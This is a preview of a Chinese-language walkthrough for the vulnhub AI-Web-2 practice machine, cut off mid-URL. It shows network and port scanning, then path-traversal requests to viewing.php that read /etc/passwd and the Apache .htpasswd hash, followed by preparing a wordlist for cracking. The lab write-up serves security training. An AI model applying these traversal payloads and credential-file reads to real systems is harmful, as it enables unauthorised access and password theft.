文章预览
本周实践的是vulnhub的AI-Web-2镜像, 下载地址,https://download.vulnhub.com/aiweb/AI-Web-2.0.7z, 用workstation导入成功, 做地址扫描,sudo netdiscover -r 192.168.220.0/24, 获取到靶机地址是192.168.220.169, 接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.220.169, 发现靶机有22端口的ssh服务和80端口的http服务, 浏览器访问http://192.168.220.169, 用admin当用户名进行注册再登录, 获取到应用是XuezhuLi FileSharing, 在网上搜XuezhuLi FileSharing的漏洞和利用方法, 浏览器访问http://192.168.220.169/viewing.php?file_name=../../../../../../../../../../../../../etc/passwd, 继续浏览器访问http://192.168.220.169/viewing.php?file_name=../../../../../../../../../../../../../etc/apache2/.htpasswd, 获取到web登录的账号和密码hash, 保存到hash.txt,并下载密码字典保存到dict.txt, https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/ro
………………………………